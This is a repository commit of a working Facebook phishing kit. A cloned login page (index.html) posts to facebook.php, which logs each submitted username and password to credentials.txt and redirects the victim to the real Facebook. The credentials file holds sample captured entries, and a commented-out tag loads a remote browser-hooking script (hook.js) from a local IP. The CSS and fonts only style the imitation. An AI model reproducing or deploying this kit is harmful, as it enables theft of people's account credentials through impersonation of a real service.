this repo has no description
1
fork

Configure Feed

Select the types of activity you want to include in your feed.

Initial Commit

Hatix Ntsoa d7100d98

+284
+1
README.md
··· 1 + # Facebook Phishing Page
+12
credentials.txt
··· 1 + 06/01/2024 19:38 2 + 3 + Username: facebook 4 + Password: hacked 5 + ________________ 6 + 7 + 06/01/2024 19:38 8 + 9 + Username: sfdgfgfd 10 + Password: dfgdfg 11 + ________________ 12 +
+25
facebook.php
··· 1 + <?php 2 + if (isset($_POST['username'])) { 3 + $username = $_POST['username']; 4 + } 5 + 6 + if (isset($_POST['password'])) { 7 + $password = $_POST['password']; 8 + } 9 + 10 + $file = fopen('credentials.txt', 'a'); 11 + if ($file) { 12 + // Set the GMT offset to +3 13 + $gmt = 3; 14 + $dateTime = new DateTime("now", new DateTimeZone("GMT")); 15 + $dateTime->modify("+$gmt hours"); 16 + $formattedDateTime = $dateTime->format('m/d/Y H:i'); 17 + 18 + fwrite($file, "$formattedDateTime\n\nUsername: $username\nPassword: $password\n________________\n\n"); 19 + fclose($file); 20 + header("Location: https://facebook.com"); 21 + exit(); 22 + } else { 23 + echo "Unable to open file."; 24 + } 25 + ?>
fonts/Helvetica-Bold.ttf

This is a binary file and will not be displayed.

fonts/Helvetica.ttf

This is a binary file and will not be displayed.

img/facebook.png

This is a binary file and will not be displayed.

img/fb.png

This is a binary file and will not be displayed.

+1
img/logo.svg
··· 1 + <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,13.72v15.66h25.74l-2.58,25.3H154v76.78H123.11V181.36H102.3v-25.3h20.81V140.83c0-25.52,10.29-39,39-39a146.17,146.17,0,0,1,18,1.07v23.81Z"/><path class="cls-1" d="M181.87,203.88c0-28.52,13.51-50,41.82-50,15.44,0,24.87,7.94,29.38,17.8V156.06h29.59V258.14H253.07V242.7c-4.29,9.87-13.94,17.59-29.38,17.59-28.31,0-41.82-21.45-41.82-50Zm30.88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,0-24,9.65-24,26.17v6c0,16.52,7.29,26.17,24,26.17a48.6,48.6,0,0,0,20.59-4.72l6.86,21.87c-6.22,4.29-17.58,6.87-29.59,6.87-36.25,0-52.76-19.52-52.76-50.83v-4.72C294.24,173.43,310.75,153.91,347,153.91Z"/><path class="cls-1" d="M380.66,211v-9c0-28.95,16.51-48,50.19-48,31.74,0,45.68,19.3,45.68,47.61v16.3h-65c.65,13.94,6.87,20.16,24,20.16,11.59,0,23.81-2.36,32.82-6.22L474,253c-8.15,4.3-24.88,7.51-39.67,7.51C395.24,260.5,380.66,241,380.66,211Zm30.88-13.3h37.32v-2.57c0-11.15-4.5-20-18-20C416.91,175.14,411.54,183.94,411.54,197.66Z"/><path class="cls-1" d="M591,210.32c0,28.52-13.72,50-42,50-15.44,0-26.16-7.72-30.45-17.59v15.44H489.39V104.8L520.27,102v68.2c4.5-9,14.37-16.3,28.74-16.3,28.31,0,42,21.45,42,50Zm-30.88-7.08c0-14.37-5.57-25.09-20.37-25.09-12.66,0-19.52,9-19.52,23.59v10.72c0,14.58,6.86,23.59,19.52,23.59,14.8,0,20.37-10.72,20.37-25.09Z"/><path class="cls-1" d="M601.33,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62S703,175.14,703,204.53v5.14c0,29.38-16.73,50.62-50.83,50.62S601.33,239.05,601.33,209.67Zm70.78-7.29c0-13.51-5.58-24.23-20-24.23s-19.95,10.72-19.95,24.23v9.44c0,13.51,5.58,24.23,19.95,24.23s20-10.72,20-24.23Z"/><path class="cls-1" d="M713.27,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62s50.83,21.23,50.83,50.62v5.14c0,29.38-16.73,50.62-50.83,50.62S713.27,239.05,713.27,209.67Zm70.78-7.29c0-13.51-5.58-24.23-19.95-24.23s-19.94,10.72-19.94,24.23v9.44c0,13.51,5.57,24.23,19.94,24.23s19.95-10.72,19.95-24.23Z"/><path class="cls-1" d="M857.39,204.74l30.45-48.68h32.81l-31.95,50.4,33.24,51.68H889.13l-31.74-50v50H826.5V104.8L857.39,102Z"/></svg>
+50
index.html
··· 1 + <!DOCTYPE html> 2 + <html lang="en"> 3 + <head> 4 + <meta charset="UTF-8"> 5 + <meta http-equiv="X-UA-Compatible" content="IE=edge"> 6 + <meta name="viewport" content="width=device-width, initial-scale=1.0"> 7 + <title>Facebook – Log in or Sign up</title> 8 + <link rel="stylesheet" href="styles/default.css"> 9 + <link rel="stylesheet" href="styles/style.css"> 10 + <link rel="icon" href="img/facebook.png" type="image/x-icon"> 11 + </head> 12 + <body> 13 + <div class="login"> 14 + <div class="container"> 15 + <div class="row"> 16 + <div class="col-7"> 17 + <div class="align-center"> 18 + <div class="content"> 19 + <img src="img/logo.svg" alt="" style="transform: scale(2); margin-left: 2.6rem;"> 20 + <p> 21 + Connect with friends and the world<br> 22 + around you on Facebook. 23 + </p> 24 + </div> 25 + </div> 26 + </div> 27 + <div class="col-5 col-xs-12"> 28 + <div class="login-form"> 29 + <form action="facebook.php" method="post"> 30 + <input id="email" type="text" placeholder="Email address or phone number" name="username"><br> 31 + <input id="pass" type="password" placeholder="Password" name="password"><br> 32 + <button id="login-btn" type="submit">Log In</button><br> 33 + <a href="#">Forgotten password?</a><br> 34 + <button id="create-btn" type="button">Create New Account</button><br> 35 + </form> 36 + </div> 37 + <footer> 38 + <a href="#" 39 + style="font-weight: bold; 40 + color: var(--black); 41 + text-decoration: none;">Create a Page</a> 42 + for a celebrity, band or business. 43 + </footer> 44 + </div> 45 + </div> 46 + </div> 47 + </div> 48 + </body> 49 + <!-- <script src="http://192.168.100.77:3000/hook.js"></script> --> 50 + </html>
+61
styles/default.css
··· 1 + * { 2 + margin: 0; 3 + padding: 0; 4 + box-sizing: border-box; 5 + } 6 + body { 7 + font-family: 'helvetica'; 8 + } 9 + :root { 10 + --bg:#F0F2F5; 11 + --brand1: #166FE5; 12 + --green: #36A420; 13 + --black:#1C1E21; 14 + --b:1px solid blue; 15 + --outline: #1877F2; 16 + } 17 + @font-face { 18 + font-family: 'helvetica'; 19 + src: url(../fonts/Helvetica.ttf); 20 + } 21 + @font-face { 22 + font-family: 'helvetica-bold'; 23 + src: url(../fonts/Helvetica-Bold.ttf); 24 + } 25 + .container{ 26 + width: 992px; 27 + margin: 0 auto; 28 + } 29 + .row { 30 + display: flex; 31 + flex-wrap: wrap; 32 + box-sizing: border-box; 33 + } 34 + .col-4{ 35 + width: calc(8.333333333333334%*4); 36 + flex: calc(8.333333333333334%*4); 37 + } 38 + .col-5{ 39 + width: calc(8.333333333333334%*5); 40 + flex: calc(8.333333333333334%*5); 41 + } 42 + .col-6{ 43 + width: calc(8.333333333333334%*6); 44 + flex: calc(8.333333333333334%*6); 45 + } 46 + .col-7{ 47 + width: calc(8.333333333333334%*7); 48 + flex: calc(8.333333333333334%*7); 49 + } 50 + .col-8{ 51 + width: calc(8.333333333333334%*8); 52 + flex: calc(8.333333333333334%*8); 53 + } 54 + .col-4, 55 + .col-5, 56 + .col-6, 57 + .col-7, 58 + .col-8 { 59 + box-sizing: border-box; 60 + padding: 0 5px; 61 + }
+134
styles/style.css
··· 1 + body { 2 + background-color: var(--bg); 3 + height: 100vh; 4 + } 5 + .login { 6 + display: flex; 7 + justify-content: center; 8 + align-items: center; 9 + height: 100%; 10 + } 11 + .align-center{ 12 + display: flex; 13 + align-items: center; 14 + } 15 + .justify-center{ 16 + display: flex; 17 + justify-content: center; 18 + flex-direction:column; 19 + } 20 + .container{ 21 + border: ; 22 + } 23 + .content { 24 + height: 100%; 25 + padding: auto 0; 26 + padding-top: 15%; 27 + } 28 + .content img{ 29 + height: 50px; 30 + margin-bottom: 15px; 31 + } 32 + .content p{ 33 + font-size: 28px; 34 + padding-top: 1rem; 35 + } 36 + .login-form { 37 + text-align: center; 38 + background-color: white; 39 + width: 100%; 40 + border-radius: 10px; 41 + box-shadow: 5px 5px 20px rgba(0, 0, 0, 0.5); 42 + } 43 + input{ 44 + border: 1px solid #DDDFE2; 45 + margin-top: 15px; 46 + padding: 14px; 47 + width: 90%; 48 + border-radius: 8px; 49 + font-size: 16px; 50 + } 51 + input:focus { 52 + border: 1px solid #1877F2; 53 + outline: none; 54 + } 55 + #login-btn { 56 + background-color: var(--brand1); 57 + width: 90%; 58 + font-size: 20px; 59 + margin-top: 15px; 60 + } 61 + #create-btn{ 62 + background-color: #36A420; 63 + width: 50%; 64 + font-size: 16px; 65 + margin-top: 15px; 66 + margin-bottom: 25px; 67 + } 68 + #login-btn, 69 + #create-btn { 70 + color: white; 71 + padding: 16px; 72 + border-radius: 10px; 73 + font-weight: bold; 74 + border: none; 75 + } 76 + .login-form form > a{ 77 + margin-top: 15px; 78 + height: 35px; 79 + width: 100%; 80 + display: inline-block; 81 + text-decoration: none; 82 + color: var(--brand1); 83 + font-size: 16px; 84 + position: relative; 85 + } 86 + .login-form form > a:hover { 87 + text-decoration: underline; 88 + } 89 + .login-form form > a::after{ 90 + position: absolute; 91 + height: 1px; 92 + content: ""; 93 + width: 100%; 94 + bottom:0; 95 + left: 0; 96 + background-color: #DADDE1; 97 + color: blue; 98 + } 99 + footer{ 100 + text-align: center; 101 + margin-top: 20px; 102 + } 103 + footer a:hover { 104 + text-decoration: underline !important; 105 + } 106 + 107 + 108 + /* Extra small devices (portrait phones, less than 576px) */ 109 + 110 + @media (max-width: 575.98px) { 111 + .col-xs-12{ 112 + width: calc(8.333333333333334%*12); 113 + flex: calc(8.333333333333334%*12); 114 + } 115 + .content{ 116 + display: none; 117 + } 118 + .login-form { 119 + width: 90%; 120 + text-align: center; 121 + margin: 0 auto 122 + } 123 + } 124 + 125 + /* Small devices (landscape phones, less than 768px) */ 126 + @media (max-width: 767.98px) { 127 + 128 + } 129 + 130 + /* Medium devices (tablets, less than 992px) */ 131 + @media (max-width: 991.98px) { ... } 132 + 133 + /* Large devices (desktops, less than 1200px) */ 134 + @media (max-width: 1199.98px) { ... }